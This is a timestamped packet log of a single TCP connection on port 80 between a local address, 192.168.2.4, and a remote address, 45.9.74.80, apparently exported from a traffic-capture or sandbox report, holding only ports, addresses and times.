Jul 27, 2023 20:19:00.497992992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.498001099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.498035908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.499979973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.500004053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.500022888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.500050068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.500066042 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.500097036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.514658928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.514736891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.514764071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.514817953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.514825106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.514843941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.514862061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.514897108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515108109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515129089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515145063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515157938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515177011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515188932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515204906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515223980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515240908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515254974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515266895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515284061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515294075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515311003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515328884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515342951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515355110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515371084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515845060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515866041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515883923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515904903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515911102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515930891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515935898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515954018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515960932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.515979052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.515995979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516014099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516026974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516038895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516052961 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516067028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516086102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516103983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516119003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516134024 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516144991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516160011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516177893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516200066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516210079 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516226053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516237974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516252995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516285896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516307116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516319036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516333103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516345978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516360044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516377926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516395092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516407967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516421080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.516434908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.516448021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.518572092 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.518596888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.519669056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.519690037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.519731998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.520231962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520251989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520296097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.520391941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520411015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520431042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520448923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520462990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.520478010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520490885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.520505905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520525932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520544052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520558119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.520570040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520586967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.520596981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.520627975 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.521626949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521667957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521687031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521699905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521718979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521738052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521755934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521774054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521792889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521811008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521864891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.521909952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521929979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521975040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.521991968 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.522003889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.522037983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.522056103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.522074938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.522088051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.522105932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.522114038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.522134066 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.523654938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.523679018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.523698092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.523716927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.523734093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.523763895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.537703037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.537739038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.537872076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.537900925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.537920952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.537940025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.537966013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.538096905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538117886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538136959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538146973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.538193941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.538794041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538816929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538836002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538856030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538875103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538883924 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.538904905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.538913012 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.539825916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539848089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539866924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539890051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539896965 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.539907932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.539922953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539931059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.539948940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539966106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.539984941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540002108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540011883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540030003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540040016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540059090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540076971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540097952 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540105104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540124893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540132999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540149927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540164948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540177107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540195942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540215015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540234089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540245056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540271997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540292978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540327072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540366888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540391922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540406942 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540422916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540441990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540456057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.540465117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.540484905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.541490078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.542009115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.542036057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.542059898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.542103052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.542114973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.542140961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.542152882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.542171955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.543833017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.543859005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.543880939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.543904066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.543965101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.543965101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.543997049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544023037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544048071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544070005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544083118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544106960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544123888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544140100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544163942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544186115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544209957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544231892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544231892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544311047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544338942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544365883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544377089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544399023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544409990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544430017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544452906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544488907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544496059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544523001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544547081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544559956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544583082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544608116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544622898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544640064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544660091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544672012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544693947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544711113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.544727087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544751883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.544796944 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.547276020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.547302008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.547323942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.547346115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.547373056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.547379971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.547399044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.547425985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.560136080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.560178995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.560337067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.560379982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.560422897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.560447931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.560483932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.560499907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.560545921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.561028004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.561064959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.561099052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.561165094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.561186075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.561249971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.562912941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.562948942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.562982082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563014030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563066959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563088894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563213110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563247919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563281059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563299894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563324928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563358068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563390017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563409090 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563433886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563446045 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563477039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563508987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563539028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563553095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563585997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563611031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563632011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563664913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563678026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563707113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563739061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563771009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563791037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563815117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563826084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563855886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563888073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563903093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.563930988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563962936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.563993931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.564007044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.564033031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.564049006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.564080954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.564310074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.564346075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.564369917 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.564393044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.564405918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.564435959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.565402985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.566369057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.566405058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.566437960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.566495895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.567581892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567620039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567641020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.567666054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567698956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567729950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567744017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.567769051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.567785978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567819118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567852974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567886114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567898989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.567924976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.567939997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.567971945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568005085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568037033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.568049908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.568074942 CEST	49693	80	192.168.2.4	45.9.74.80
